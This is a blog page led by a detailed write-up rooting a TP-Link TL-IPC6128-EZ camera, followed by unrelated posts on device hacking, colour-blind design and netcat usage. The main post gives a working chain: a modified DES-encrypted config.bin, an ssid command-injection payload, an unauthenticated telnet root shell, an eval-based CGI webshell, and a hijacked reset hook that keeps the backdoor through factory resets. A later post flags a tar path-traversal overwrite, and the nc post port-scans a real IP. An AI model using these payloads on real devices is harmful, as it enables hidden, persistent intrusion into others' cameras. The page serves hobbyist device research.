TP-Link IPC6128-EZ:从 config.bin 到持久化 Root Shell

本文记录了对 TP-Link TL-IPC6128-EZ 网络摄像头的完整安全研究过程:通过构造特殊的 config.bin 进入工厂测试模式,利用 PERF_TEST 模块的命令注入漏洞获取 shell,并通过 overlayfs hook 实现跨恢复出厂的持久化。

目标设备

  • 型号: TP-Link TL-IPC6128-EZ
  • SoC: ARM 32-bit, EABI5
  • 系统: Linux 4.19.91, uClibc 1.0.31
  • 文件系统: SquashFS rootfs(只读)+ UBIFS overlay(可写,持久化)
  • 核心进程: /bin/main 包含所有业务逻辑

0x01 固件分析

MTD 分区布局

mtd0: 2MB    factory_boot    引导加载器
mtd1: 2.5MB  factory_info    设备信息(MAC、硬件版本等)
mtd2: 1.5MB  art             应用配置(radio calibration)
mtd3: 2MB    config          设备配置(UBI 格式)
mtd4: 1MB    normal_boot     正常启动引导
mtd5: 6MB    kernel          Linux 内核
mtd6: 32MB   rootfs          SquashFS 根文件系统
mtd7: 80MB   rootfs_data     UBIFS overlay 数据
mtd8: 1MB    tp_header       TP-Link 固件头
mtd9-12: 128MB×4             AI 模型数据(人脸/人形/车牌检测等)

文件系统架构

设备使用经典的 OpenWrt overlayfs 方案:

/(overlayfs)
├── lowerdir = SquashFS rootfs(只读)
└── upperdir = /overlay/upper(UBIFS,可写)
    └── workdir = /overlay/work

/overlay/upper/ 中的文件会覆盖 rootfs 中的同名文件。这是持久化的关键。

启动流程

preinit → mount_root(挂载 UBIFS → fopivot 创建 overlayfs)
       → /sbin/init
       → /etc/init.d/rcS
           → S05boot
           → S10sysinit
           → S15monitor
           → S20main(启动 /bin/main)
           → S98*(自定义脚本在这里执行)

0x02 攻击面分析

SD 卡事件处理

/bin/main 监听 SD 卡插入事件,有三条处理路径:

路径函数触发条件守卫条件
PERF_TESTsd_onboarding_cbSD 卡插入 + factory_test_mode=1检查 factory_test_mode(非 “main already start”)
PLUGIN_MANAGEsd_plugin_ready_cbSD 卡有 plugin 文件“main already start” 全局标志
UPGRADEsd_upgrade_res_cbSD 卡有固件文件“main already start” 全局标志

PLUGIN_MANAGE 和 UPGRADE 都被 “main already start” 全局标志阻塞,main 启动后这个标志就被置位,无法绕过。

唯一可用的路径是 PERF_TEST,它检查的是 factory_test_mode 而非 “main already start”。

PERF_TEST 命令注入

sd_onboarding_cb(位于 0x22c744)的处理流程:

1. 检查 factory_test_mode == 1(从 /factory_info/factory_test_mode 读取)
2. 读取 SD 卡上的 config.txt
3. 解析 JSON 提取 ssid 和 password
4. url_decode(ssid) → snprintf(cmd, "... '%s' ...", ssid) → system(cmd)

关键反汇编(0x22c744 附近):

asm

; 读取 config.txt 中的 ssid
bl    url_decode          ; URL 解码 ssid
bl    snprintf            ; 格式化到命令字符串
                          ; cmd = "ubus call onboarding connect '{\"ssid\":\"<ssid>\", ...}'"
bl    system              ; 执行命令!

日志字符串 [PERF_TEST]cmd is %s 确认了 system() 调用的存在。

漏洞: ssid 字段经过 url_decode 后直接拼接到 shell 命令中,没有任何过滤或转义。通过在 ssid 中注入 shell 元字符,可以执行任意命令。

0x03 进入工厂测试模式

config.bin 格式

设备的配置文件 config.bin 使用 DES-CBC 加密:

  • 算法: DES-CBC
  • 密钥: D30474E282B5A282(从二进制中提取)
  • IV: 全零
  • 内部格式: 自定义二进制容器,包含多个配置节点,每个节点是压缩的 JSON

构造 factory_test_mode config.bin

流程:

# 1. 从 Web UI 下载当前配置备份
#    浏览器打开 http://<摄像头IP> → 系统设置 → 备份配置

# 2. 修改配置,启用 factory_test_mode
python3 build_config_bin.py set config_backup.bin config_ftm.bin \
    --kv 'factory_info.factory_test_mode.factory_test_mode.enabled=1'

# 3. 通过 Web UI 上传修改后的 config_ftm.bin
#    系统设置 → 恢复配置 → 选择 config_ftm.bin

上传后设备重启,进入工厂测试模式。此时:

  • 所有模块进入工厂状态
  • OSD 不显示
  • LED 闪红灯
  • PERF_TEST 路径被激活

建议使用从同一台设备当前状态导出的备份作为基础。使用其他设备或旧版本的配置可能导致设备无响应。

0x04 命令注入获取 Shell

准备 SD 卡

SD 卡根目录需要三个文件:

/sdcard/
├── config.txt          # 命令注入 payload
├── busybox_arm32       # 静态编译的 busybox(ARM32)
└── s.sh                # 部署脚本

config.txt —— 注入 payload

{
  "ssid": "x';sh /tmp/sdcard/s.sh;echo '",
  "password": "x"
}

sd_onboarding_cb 处理这个 ssid 时,实际执行的命令变成:

ubus call onboarding connect '{"ssid":"x';sh /tmp/sdcard/s.sh;echo '", "password":"x"}'

分解一下:

  1. ubus call onboarding connect '{"ssid":"x' — ubus 命令,ssid 部分被截断
  2. ;sh /tmp/sdcard/s.sh;注入的命令
  3. echo '", "password":"x"}' — 消化剩余字符串,避免语法错误

绕过”保护环境”

设备的 /bin/ash 有命令白名单,大部分命令会返回 "cmd not supported under protected environment"。绕过方法:

# 用 busybox_full 创建一个不受限制的 ash
BB="/overlay/upper/bin/busybox_full"
ln -sf "$BB" /tmp/ash

# 在不受限制的 ash 上启动 telnetd
"$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0

端口 4445 上的 telnet 会话使用 busybox 自带的 ash,不受保护环境限制。

0x05 部署脚本详解

s.sh 是 PERF_TEST 注入后自动执行的核心脚本,完成以下任务:

Phase 1: 部署 Shell 到 Overlay

# Busybox
mkdir -p /overlay/upper/bin
cp /tmp/sdcard/busybox_arm32 /overlay/upper/bin/busybox_full
chmod 755 /overlay/upper/bin/busybox_full

# CGI Webshell(通过 HTTP 执行命令)
mkdir -p /overlay/upper/www/cgi-bin
cat > /overlay/upper/www/cgi-bin/sh << 'CGI'
#!/bin/ash
echo "Content-Type: text/plain"; echo ""
CMD=$(echo "$QUERY_STRING" | sed -n 's/.*cmd=\([^&]*\).*/\1/p')
# ... URL 解码 + eval 执行 ...
CGI

# 开机自启脚本(S98remote)
cat > /overlay/upper/etc/init.d/remote << 'INIT'
#!/bin/ash /etc/rc.common
START=98
start() {
    BB="/overlay/upper/bin/busybox_full"
    ln -sf "$BB" /tmp/ash
    "$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0
    "$BB" httpd -p 8888 -h /overlay/upper/www
}
INIT
ln -sf ../init.d/remote /overlay/upper/etc/rc.d/S98remote

写入 /overlay/upper/ 的文件通过 overlayfs 覆盖 rootfs,重启后依然存在。

Phase 2: 连接 Wi-Fi

工厂模式下 Wi-Fi 驱动已加载(PERF_TEST 本身就需要测试 Wi-Fi),但注入破坏了原始的 onboarding 命令。脚本用正确的凭据重新连接:

ubus call onboarding connect '{"ssid":"OOXX", "password":"12345678"}'

Phase 3: 启动服务

BB="/overlay/upper/bin/busybox_full"
ln -sf "$BB" /tmp/ash
"$BB" telnetd -l /tmp/ash -p 4445 -b 0.0.0.0   # 无限制 shell
"$BB" httpd -p 8888 -h /overlay/upper/www         # webshell

部署完成后,连接:

telnet <摄像头IP> 4445
# 或浏览器访问 http://<摄像头IP>:8888/cgi-bin/sh?cmd=id

0x06 持久化:自愈 Hook

问题

Shell 部署在 /overlay/upper/ 中,正常重启时会保留。但恢复出厂设置会清空 /overlay/upper/

# /hooks/post_reset_hook.sh(rootfs 中的原始版本)
#!/bin/sh
if [ -d "/overlay" ]; then
    cd /overlay
    rm -rf `ls | grep -v "plugins"`
fi

注意:plugins/ 目录被保留(grep -v "plugins"),因为里面存放 AI 模型文件。

解决方案:Hook 劫持

通过 overlayfs 覆盖 post_reset_hook.sh,让恢复出厂设置时自动恢复 shell 文件。

关键前提验证(通过反汇编确认):

/bin/main0x23a418 处调用 hook:

0x23a418:  push  {r4, lr}
0x23a41c:  bl    0x23a318          ; config_recovery(重置配置)
0x23a420:  cmn   r0, #1
0x23a424:  popeq {r4, pc}          ; 不需要重置则返回
0x23a42c:  ldr   r0, "/hooks/post_reset_hook.sh"
0x23a430:  bl    access@plt        ; 检查文件是否存在
0x23a440:  bl    system@plt        ; 执行 hook
0x23a448:  b     reboot@plt        ; 重启

关键事实:

  1. Hook 由 main运行时调用,此时 overlayfs 已挂载
  2. system("/hooks/post_reset_hook.sh") 通过 overlayfs 解析路径
  3. 我们在 /overlay/upper/hooks/ 的文件会优先于 rootfs 中的原版
  4. Hook 执行完毕后才调用 reboot()

实现

Step 1: 备份到 plugins/(恢复出厂不删除)

mkdir -p /overlay/plugins/shell_backup/restore/{bin,etc/init.d,www/cgi-bin,hooks}

cp /overlay/upper/bin/busybox_full      /overlay/plugins/shell_backup/restore/bin/
cp /overlay/upper/etc/init.d/remote     /overlay/plugins/shell_backup/restore/etc/init.d/
cp /overlay/upper/www/cgi-bin/sh        /overlay/plugins/shell_backup/restore/www/cgi-bin/

# 权限恢复脚本
cat > /overlay/plugins/shell_backup/restore/fix_links.sh << 'EOF'
#!/bin/ash
mkdir -p /overlay/upper/etc/rc.d
ln -sf ../init.d/remote /overlay/upper/etc/rc.d/S98remote
chmod 755 /overlay/upper/bin/busybox_full
chmod 755 /overlay/upper/etc/init.d/remote
chmod 755 /overlay/upper/www/cgi-bin/sh
EOF

Step 2: 覆盖 post_reset_hook.sh

mkdir -p /overlay/upper/hooks
cat > /overlay/upper/hooks/post_reset_hook.sh << 'HOOK'
#!/bin/sh
RESTORE_SRC="/overlay/plugins/shell_backup/restore"

if [ -d "/overlay" ]; then
    cd /overlay

    # 原始行为:删除除 plugins/ 以外的一切
    rm -rf $(ls | grep -v "plugins")

    # 自愈:从 plugins/ 恢复 shell
    if [ -d "$RESTORE_SRC" ]; then
        mkdir -p /overlay/upper
        cp -r ${RESTORE_SRC}/bin /overlay/upper/
        cp -r ${RESTORE_SRC}/etc /overlay/upper/
        cp -r ${RESTORE_SRC}/www /overlay/upper/
        cp -r ${RESTORE_SRC}/hooks /overlay/upper/
        sh ${RESTORE_SRC}/fix_links.sh 2>/dev/null
        mkdir -p /overlay/work/work
    fi
fi
HOOK
chmod 755 /overlay/upper/hooks/post_reset_hook.sh

工作流程

用户按 Reset 按钮
    ↓
main 检测到 GPIO 事件
    ↓
config_recovery() — 重置所有配置(factory_test_mode → 0)
    ↓
system("/hooks/post_reset_hook.sh") — 执行我们的版本!
    ↓
rm -rf upper/ work/     — 清理(hook 自身也被删除,但已在内存中)
    ↓
cp -r plugins/restore/* → upper/  — 恢复 shell 文件
    ↓
reboot()
    ↓
设备启动:正常模式 + shell

Hook 自身也被复制回 upper/hooks/,因此后续的恢复出厂设置也会自愈——无限循环持久化

0x07 完整攻击流程总结

┌───────────────────────────┐
│  1. 从 Web UI 下载 config.bin 备份                   │
│  2. 修改 factory_test_mode.enabled = 1               │
│  3. 上传修改后的 config.bin → 设备进入工厂模式      │
├───────────────────────────┤
│  4. 准备 SD 卡:config.txt + busybox + s.sh          │
│  5. 插入 SD 卡 → PERF_TEST 触发命令注入             │
│  6. s.sh 自动部署 shell + 安装自愈 hook              │
├───────────────────────────┤
│  7. 按 Reset 按钮恢复出厂                            │
│  8. 自愈 hook 自动恢复 shell                         │
│  9. 设备回到正常模式,shell 完好                     │
│ 10. 重新配对摄像头,完成                             │
└───────────────────────────┘

0x08 踩坑记录

ubus 在工厂模式下为空

工厂模式下 main 的所有模块进入工厂状态,ubus 服务注册被跳过。因此无法通过 ubus 命令退出工厂模式。

factory_test_mode 存储位置

factory_test_mode 通过 /dev/slp_flash_chrdev(专有内核驱动,ioctl 接口)存储,不在标准 MTD/UBI 设备中。无法通过 dd 或 mount 直接修改。只有 config_recovery(恢复出厂)能将其重置为 0。

0x09 POC

拆解 TP-Link 监控摄像头设置备份文件 config.bin 的格式

因为各种原因,手上有一个中国大陆版的 TL-IPC6128-EZ,tplink为了不让用戶將它拿去其他国家用,可谓是下了真功夫。

其中最坑的就是OSD的水印时间是写死的中国大陆时区CST-8。

除了手动设定时间、搭建一个做过手脚的ntp伺服器以外,我选择看看机器备份档config.bin是否包含时区信息,于是有了这篇文章。(剧透:有时区信息,但是改了也没用)

整个过程踩了不少坑,记录下来。

1. 整体结构

config.bin
├─ [0x00:0x10] MD5(ciphertext)               ← 唯一的明文头
└─ [0x10:EOF ] DES-CBC( 外层明文 )           ← 单 DES,key 来自设备encrypt_key,IV=0
     ├─ 0x000 TP_HEAD(0x18) + vendor_id/zone_code + 长度字段
     ├─ 0x200 顶层 NVMP-CONFIG 容器:magic + product_id + datalen
                config_file_head:
                +0x00  "NVMP-CONFIG\0" // 12 字节 magic
                +0x10  product_id  u32 BE // product_id
                +0x14  datalen     u32 BE // 其后所有节点字节数
     └─ 0x218 配置节点(node)
          ├─ +0x10 count(LE)  // JSON 条目数
          ├─ +0x14 clen(LE)   // zlib 压缩流长度
          ├─ +0x18 ulen(LE)   // 解压后长度
          └─ +0x1c body = DES-CBC( zlib( item0\0 item1\0 … ) ) // 内层再一层 DES + zlib

外层与内层各有一层 DES(同 key、同 IV=0),内层 DES 之内再套 zlib,zlib 之内是一串 NUL 分隔的 JSON 配置表。加密为单 DES,非 AES

key不知道是不是统一的,我这个型号的key是:D30474E282B5A282

2. 加密:单 DES

/bin/main 内含 AES_cbc_Decrypt_no_paddingAES256-CBC 等符号,但与 config.bin 无关:AES_cbc_Decrypt_no_padding0x2f339c)全程序仅一个调用者,其上下文皆为 password、socket、RTSP 字符串,猜测是tplink云平台相关的东西。

config.bin 的解密路径为 uc_post_handle → 0x32b548 → 0x32b26c

0x32b26c:
  读取 /tmp/base-files/etc/encrypt_key
  这是一个16 个十六进制字符,比如我手上这台是D30474E282B5A282
  hex_str_to_bytes(dst, key_str, 8)      → 转换成 8 字节 DES 密钥
  密钥核心 0x30137c / 0x3013dc:
       bic r3, r3, #7      ; 长度向下取整到 8 的倍数
       … 每轮步进 #8 …      ; 8 字节一组分组

同一把 key、同一个 IV=0 同时用于外层文件内层节点 body 两处 DES。加解密为同一函数 0x32b26cmode 参数:0x32b540(mode=0) 为加密、0x32b548(mode=1) 为解密。

3. 外层明文布局

偏移相对明文起点(= 文件偏移 − 0x10):

+0x000  TP_HEAD (0x18)
          +0x00  00 00 01 00
          +0x04  20 字节签名            ← 和设备 /tp_header 比对
+0x020  vendor_id   u16 LE
+0x022  zone_code   u16 LE
+0x040  len_head    u32 BE
+0x044  len_data    u32 BE              ← 校验:filelen ≥ len_head + len_data
+0x200  config_file_head:
          +0x00  "NVMP-CONFIG\0"        12 字节 magic
          +0x10  product_id  u32 BE     (= 设备 product_id)
          +0x14  datalen     u32 BE     (其后所有节点字节数)
+0x218  第一个配置节点

除开头 16 字节的 MD5 外,所有字段(含 product_id、TP_HEAD 签名)皆位于 DES 解密后的明文内,文件表面不可见。实测本机 product_id = 61281 (0xEF61)vendor_id = 0zone_code = 0

4. 内层:NVMP 配置节点

逆向自 parse_config (0x32c514),并以真机数据交叉验证。

4.1 节点头(28 字节,0x218 起)

+0x00  "NVMP-CONFIG\0"          12 字节
+0x0c  flag                      通常 00 00 00 01 (BE 1)
+0x10  count   u32 LE            JSON 条目数     (实测 165)
+0x14  clen    u32 LE            zlib 压缩流长度 (实测 9583,未补齐)
+0x18  ulen    u32 LE            解压后字节数    (实测 120431)
+0x1c  body

注意端序:节点头的 count/clen/ulen小端,而顶层容器的 product_id/datalen大端,同文件混用Orz。

4.2 body 的三层解码

body(磁盘上,补齐到 8 字节)
  ── DES-CBC 解密 // 以 78 DA 开头的 zlib 流
  ── zlib 解压    // 120431 字节明文
  ── 按 \0 切分   // 165 段紧凑 JSON

每段为一张配置表,例如:

{"system":{"system":{"sys":{"dev_alias":"%e9%81%93%e8%b7%afA","timezone":"CST-8"}}}}
{"image":{"para":{"common":{"luma":"50","contrast":"50"}}}}

特征:值几乎皆为字符串(含数字、布尔);中文等经 URL 百分号编码;顶层键可重复(多条 systemimage),须以保序列表处理,不可合并为单一字典;count 等于条目数,切分时丢弃尾部空段。

这里出现了时区,但是实测修改这个值并没有任何卵用,OSD时间不遵循这个时区设定,tplink 煞笔。

4.3 写回时的长度字段重算

comp       = zlib(blob, level=9)
clen       = len(comp)          # 未补齐
body       = DES(comp 补齐到 8)
datalen    = 28 + len(body)     # 顶层容器,大端
ulen       = len(blob)
count      = len(items)
外层       = 头部[:0x218] + 节点;补齐 8 字节,重算 len_head/len_data,外层 DES + MD5

5. 服务端校验:uc_post_handle

HTTP 路由 /admin/system/upload_conf 对应处理函数 0x210420。逆向之后得到校验顺序:

context 非空 
↓
MD5(file[16:]) == file[0:16]↓
DES-CBC 解密成功 
↓
总长 ≥ BE32(@0x40) + BE32(@0x44)↓
明文长度 > 0x200(config_file_head 有效) 
↓
BE32(@0x210) == 设备 product_id↓
TP_HEAD[0x04:0x18] 匹配 && vendor_id 匹配 && zone_code 匹配 
↓
parse_config 成功

全数通过后进入成功分支(0x210634 → msg_send(0x5014))应用配置。

负责落盘的函数(~0x291f80)实际调用:

  • fopen/fwrite → 写 /tmp/base-files/etc/hardware.config(及 /tmp/hardware.config)
  • fopen/fwrite → 写 /tmp/app_config.bin
  • system() ×2 → 执行(逐字命中固件内字符串):
    • mkdir -p /tmp/base-files/etc/;
    • tar -zxvf /tmp/app_config.bin -C /tmp/;rm -rf /tmp/app_config.bin;chmod -R 777 /tmp/base-files;chmod -R 777 /tmp/radio; // tplink非常风骚的操作,这里可以构造一个带路径穿越的tar.gz包,直接覆盖任意文件

用ai写的config.bin参数值修改、打包工具

使用说明

一、 基础准备

在运行脚本之前,你需要确保环境满足以下要求:

  1. 健康的大脑
  2. Python 3。
  3. 安装依赖库: 该脚本需要 pycryptodome 库来进行 DES 解密。
    不懂去问AI

二、大概流程

如果你想修改摄像头的某个功能参数(比如修改网络设置、账号等),最标准的流程是:导出 → 修改 → 校验 → 导入

第一步:导出当前配置为 JSON

首先,你需要从设备上获取一份原始的 config.bin 文件。 使用 export 命令将其转换为人类可读的 JSON 文件:

bashpython build_config_bin.py export config.bin config.json

会得到一个 config.json 文件,里面包含了所有的配置项。

第二步:修改 JSON 文件

手动打开 config.json,找到你想修改的参数进行编辑。

第三步:将修改后的 JSON 导入并生成新文件

使用 import 命令。这里需要原始的 config.bin 作为模板,因为它包含了设备唯一的硬件标识(如 product_id, vendor_id 等)。

bashpython build_config_bin.py import config.bin config.json new_config.bin

新构造的文件在同目录下 new_config.bin

第四步:校验文件

先本地检查一下可不可以通过固件检查:

bashpython build_config_bin.py verify new_config.bin

结果:如果看到 全部通过,说明文件格式本身合法,大概率可以上传成功(摄像头可以轻松变砖 笑)。


三、 其他功能

除了上述标准流程,脚本还提供了一些快捷工具:

1. 快速修改

如果你只需要改一个简单的字符串参数,可以使用 set 命令直接在二进制文件上操作:

bash# 假设你要把某个路径下的 key 改为 "new_value"
python build_config_bin.py set config.bin output.bin --kv "path.to.key=new_value"

2. 跨设备适配(重建配置)

如果你有一份 A 设备的配置,想把它的内容搬到 B 设备上,可以使用 rebuild。它会保留 A 设备的配置内容,但把 B 设备的硬件 ID 填入头部:

bashpython build_config_bin.py rebuild template.bin output.bin --product-id 61281 --vendor-id 0 --zone-code 0

3. 查看内部结构

可以使用 nodes 命令查看配置里有哪些节点:

bashpython build_config_bin.py nodes config.bin

这会列出所有的 NVMP 节点、类型(JSON 还是二进制数据)以及它们在文件中的位置。

4. 提取特定内容

如果你只需要提取某一部分(比如提取出里面的 app_config 压缩包):

bashpython build_config_bin.py extract config.bin 0 some_data.bin

注:0 是节点序号,可以在 nodes 命令中查看。

5. 基础解密/加密

如果你只是想单纯地把文件转换成明文或加密回二进制:

  • 解密python build_config_bin.py decrypt config.bin plaintext.txt
  • 加密python build_config_bin.py encrypt plaintext.txt config.bin

重要提示

DES Key:硬编码了 DES 解密密钥(D30474E282B5A282),不确定其他型号可不可以用。

备份:在操作任何 config.bin 之前,请务必保留原始文件的备份。

硬件匹配:除非你非常清楚自己在做什么,否则不要在不同型号的摄像头之间随意混用 config.bin,这可能导致设备变砖。

不提供任何保证。

斐訊R1智障音箱通過adb調試介面安裝apk實現AirPlay和DLNA功能

2025年9月6日更新:感謝網友haha推薦反饋,藍莓投屏比樂播投屏更好用一些。傳送門

因為揀垃圾是一件很快樂的事情,一年前(2019年)我特意從中國大陸的網站上購買了很多斐訊遺產,其中就包括斐訊R1音箱,通過重重困難飄洋過海轉運到了日本。

剛剛拿到手的R1音箱是沒有拆封的,不同時期生產的R1音箱,內置的韌體(ROM)版本是不一樣的,舊版本的韌體音質校準不是特別理想,需要通過DNS劫持、push工廠配置文件等等的方法升級到最新版本,網絡上有很多教程,有需要的人可以Google一下,應該馬上就可以找到。

廢話不多說,下面是正題:

如何通過adb調試介面安裝App?

首先要找到斐訊R1音箱的IP位址。

有很多方法,比如查看路由器的DHCP分配位址表:

Host Name是「Phicomm_R1」開頭的就是斐訊R1音箱

知道斐訊R1的IP位址之後,用adb連接它!

OX-Macbook:~ ox$ adb connect 192.168.0.40
connected to 192.168.0.40:5555

然後用adb push命令把需要安裝的apk推送到音箱上:

adb push [apk文件所在的本地路徑] /data/local/tmp/

// 比如這樣:
// adb push /Users/ox/Desktop/airplay.apk /data/local/tmp/

然後通過調用pm工具安裝剛才push的apk安裝包:

adb shell /system/bin/pm install -t /data/local/tmp/[文件名]
額外提醒

如果你不知道轉義字符是什麼東西,那你的文件名最好不要有奇怪的字符,比如空格和括號之類的。

安裝AirPlay接收端

「樂播投屏TV版」和「AirPin」還有「Media Center」我都在用。

AirPin 是收費的App,但是也有免費的版本(AirPin Lite),在R1上用的話已經足夠了。

樂播投屏TV版 是免費的App,但是會上傳MAC地址之類的隱私內容,有時候還會擅自更新,新版本的樂播投屏TV版每次新設備連接都需要點擊允許,沒有屏幕的R1音箱就只能通過scrcpy之類的工具連接到R1之後手動點擊允許,非常麻煩,介意的話可以安裝舊版本的同時在路由器上屏蔽樂播投屏的服務器(*.hpplay.cn)。

Media Center 是免費的App,不過似乎穩定性不是特別好,但是非常輕量。

安裝DLNA接受端

上面提到的三個Apps都支援DLNA功能,自己選一個用吧。

使用scrcpy操作R1音箱的UI介面

雖然用adb調試介面可以完成大多數操作,但是比如像更改AirPlay的顯示名稱之類的操作,還是需要GUI操作,因為R1沒有屏幕,所以需要用到一些可以遠端操作Android GUI介面的工具,比如scrcpy。

scrcpy的GitHub倉庫地址:https://github.com/Genymobile/scrcpy

Windows版本在這裏可以找到。

Linux和macOS可以通過包管理器很方便地安裝,具體參考這裏

使用方法極其簡單:以macOS為例,先用adb connect命令連接到R1音箱之後,再執行scrcpy就可以了。

比如像這樣:

OX-MacBook:~ ox$ adb connect 192.168.0.40
connected to 192.168.0.40:5555
OX-Macbook:~ ox$ scrcpy
使用scrapy連接斐訊R1音箱
更改Media Center的設備顯示名稱
打開Media Center的AirPlay功能和設定R1音箱啟動後自動打開AirPlay伺服器

三款App的下載地址

樂播投屏TV版舊版本:Download

AirPin Lite:Download

Media Center:Download

设计的换位思考——针对色觉障碍人群的颜色设计

导言

“紅綠色盲人口佔全球男性人口約8%,女性人口約0.5%,他們能看到多種顏色,但是會混淆識別某些顏色,尤其是紅色與綠色。另外全球約6%人口為三色視覺(色弱),約2%人口為二色視覺(色盲),極少數為單色視覺(全色盲)。”

——Wikipedia 色盲

其中色盲、色弱也分几种类型,一般来讲有红绿色盲(Red–green Color Blindness)、蓝黄色盲(Blue-yellow Color Blindness)。

于是这篇文章大体分为两大部分:

    1. 考虑色觉障碍人士的设计的必要性
    2. 可行性/操作方法

正文

Part A

导言部分提到了色觉障碍人群在世界人口中所占的比例。可见这个人群并不算太少数,那么单独针对这个人群(重新)设计颜色、更改设计有没有这个必要呢?
有,当然有。
针对这个人群重新考量你的设计,这无疑体现的是你的设计同理心,还是对这个人群的尊重,我可以断定:这个群体在大陆还是个弱势群体,许多公共设施的标示设计大部分都忽略了这个人群或者是做的不够好。对这部分人群的设计优化,还能让你的设计得到更多人的认可,也能向更多人分享你的设计,何乐而不为?当你有了针对这类人群优化设计的想法时,你已经走在了很多设计师的前头,于是我们面临一个问题:怎样针对此类人群进行设计?

Part B

怎么做?下面来看看这几种解决方案:
使用不同形状的图案代替单纯靠颜色表达不同意思的方法。
举个反面例子:你可能正在设计一个菜谱,有件披萨饼有多种口味可供选择,黄色的圆点代表放青椒,黄绿色的圆点代表放葱,橙色的圆点代表放大蒜和辣椒。老实说这是个最糟糕的设计方案了!

正确的设计应该是这样子的:使用简单易认的图形代替用不同颜色分辨。你可以使用三角形、正方形、圆形等等的组合,上述案例还可以用青椒葱和大蒜图案来代替。

填充纹理的方法
在某些时候,并不能用上面的方法解决问题,于是有了这个方法,你可以尽情地使用你喜欢的颜色,然后在颜色上叠加一层纹理就可以了,很多时候这么做还可以更美观。

如果你有强迫症,你不能忍受在颜色上叠加纹理也不具备使用图案来优化设计的条件,同时你又不肯另外用文字标注的,那么就请务必针对色觉障碍人群重新设计一份适合的方案吧,假如是软件 可以在菜单里面增加选项有选择性地开启“色盲模式”,网页也可以使用类似的方法。其实他们不太在意你的配色是否美观,因为比起因为色觉障碍而不能正常使用相关服务这点应该不算什么。

关于指示灯:
指示灯的问题或许是最严重的了,你真的以为大部分的色觉障碍者能够很轻易地分辨红绿两个“截然不同”的颜色吗?!
更多时候他们都认为这是相同的颜色,但是其实这也不是绝对的,其实必须明白一个事实:色觉障碍人士一般来说判断不同的颜色更多的是靠他的“明度”,比如红色会比草绿色看起来“更亮”。之所以用红绿色做“批判对象”这是因为在某些规格的LED灯里面这两个颜色“明度非常相似”,但这个问题不单止对于”红绿色“而言,换作是黄色绿色这个问题也很严重。但是近几年”红绿色“这个组合在很多LED的表现下也渐渐趋于可分辨,但是仍然还是要避免单纯靠颜色辨认

下面是几张色觉模拟图,大家感受下:

从左到右的顺序分别是:正常色觉(Normal),绿色色盲(Deuteranope),红色色盲(Protanope)还有蓝色色盲(Tritanope

红色LED在各种色觉下的模拟视图

绿色LED在各种色觉下的模拟视图

蓝色LED在各种色觉下的模拟视图

所以解决的方法有:
使用不同形状的指示灯。
比如共有有两个指示灯,一个三角形一个圆形,不过这个很多时候会增加一定的成本。

使用不同的闪烁频率区分。
比如正常状态是常亮,异常就快闪什么的。这是仅仅是在程序上做一下优化,最简单的解决方案。

结束语

其实我认为很多设计师们并不是“故意”创造出那些令色觉障碍人群难看的设计的,出现这些问题仅仅是因为他们不了解这个人群,就算知道有这个人群也不知道该如何去配合他们,于是我有了写这篇文章的想法,希望大家可以了解并关注这个人群,同时希望大家可以大肆传播这篇文章,让更多人能够在设计时考虑这一部分人群的切实需要。

下面是一些扩展阅读的链接:

  • 色覚の多様性に配慮した 案内・サイン・図表等用のカラーユニバーサルデザイン 推奨配色セット(对色觉障碍者的配色方案参考)[日文]

http://jfly.iam.u-tokyo.ac.jp/colorset/index.html

  • 色覚の多様性に配慮した案内サイン図表等用のカラーユニバーサルデザイン推奨配色セット[汉化版]

https://blog.ooxx.dk/wp-content/uploads/2014/08/A0.png

  • 信息图形中的颜色探讨—面向色盲人士友好的设计解决方案

http://cdc.tencent.com/?p=5677

 

该文章只需在明确注明原作者的前提下即可随便转载、修改而不需要与我联系.

原作者: 欧峻峰 http://www.ooxx.dk

2014年8月

主題PuRuru(正式?)發佈!

太多事情要做了,忙不過來,看到 @釘子 的留言,於是我意識到主題的這個坑是不得不填了…所以我花了一天時間把絕大多數的BUG補上了….

這款主題支持後臺更改LOGO….(感覺不值一提啊)

流動式佈局,移動端支持.

多語言支持..(應該吧?笑)

好像沒什麼其他的了 Orz

開發給自己用的,有人想要的話當然可以.

象徵性地收費5RMB吧…..(開發主題不容易)

既然只收5RMB,所以當然沒有後續支持服務了.(苦笑)

就這樣吧….

2014年04月12日22:02:31

購買請發郵件到我的郵箱: ox 艾特 ooxx 點 dk

感謝支持!

[2014 春]更改WordPress的URL后缀

数学考试挂科,心里很不爽啊。。。
于是想找点东西写写,想起之前看到有些菊苣的URL很个性,于是上网找了一下资料,没有发现任何信息,于是我想 应该是通过rewrite规则实现的吧,但是我正则不怎么会,突然想到wordpress的「固定链接」。想了一下,值得一搏,于是直接再后面加上「.ox」,竟然就这样完工了?!
突然有点小喜悦。。。。?

新番API BETA2

調用地址:

http://api.bgm.ooxx.dk/

暫不支持附加參數
調用方式:直接GET獲取
返回数据类型:JSON
更新频率:每小时

[

{

“name”:”u6a31TRICK”,

“number”:”5″,

“link”:”http://www.bilibili.tv/sp/u6a31TRICK”,

“day”:”5″

}

]

說明:
『name』該番的名稱
『number』集數
『link』在B站的專題鏈接
『day』更新星期數*

*:0表示星期日,1表示星期一以此類推。
無請求次數限制,無需認證。
本人不保證其信息的準確性,並不對此負責。
本API僅返回目前正在連載的作品信息,僅返回作品
地區為日本的番

Special thanks: @YuxuanLiang

Linux nc 命令很強大!

nc或者netcat 在終端裡直接輸入man nc就可以看到詳細用法,在這裡列舉一些我認為很屌的玩法:

PORT SCANNING(端口扫描)

这东西方便好使,能用来干嘛大家都知道,用过都说好。
这样用:
nc -zv [HOST] [-]
比如: nc -zv 118.244.111.185 20-12000
我们可以得到类似这样的结果:

ox@OX-Laptop:~$ nc -zv 118.244.111.185 20-12000
Connection to 118.244.111.185 20 port [tcp/ftp-data] succeeded!
Connection to 118.244.111.185 21 port [tcp/ftp] succeeded!

DATA TRANSFER(数据传输)

这东西在非常时期估计也能发挥不少作用,比如两台电脑之间传输文件,没有配置FTP?没有SMB?

用这个也能凑合!

我们可以这样:

A端(发送端)nc -l [端口] > file.ox

B端(接受端)nc [对方IP] [端口] < file.ox

(端口要一致)

“切,你那是传一个文件,我要传整个文件夹你就弱爆了!”

谁说不能传文件夹的?!

我们可以这样:先压缩再传不就行了么?

A端(发送端)tar -cvf [目录路径] | nc -l [端口]

B端(接受端)nc -n [对方IP] [端口] | tar -xvf

(端口要一致)

CHAT ONLINE(在线聊天)

“这都行?!”

就是这么屌。

其实这是最入门级别的用法了(我觉得):

首先开个服务端(端口):

nc -l [端口]

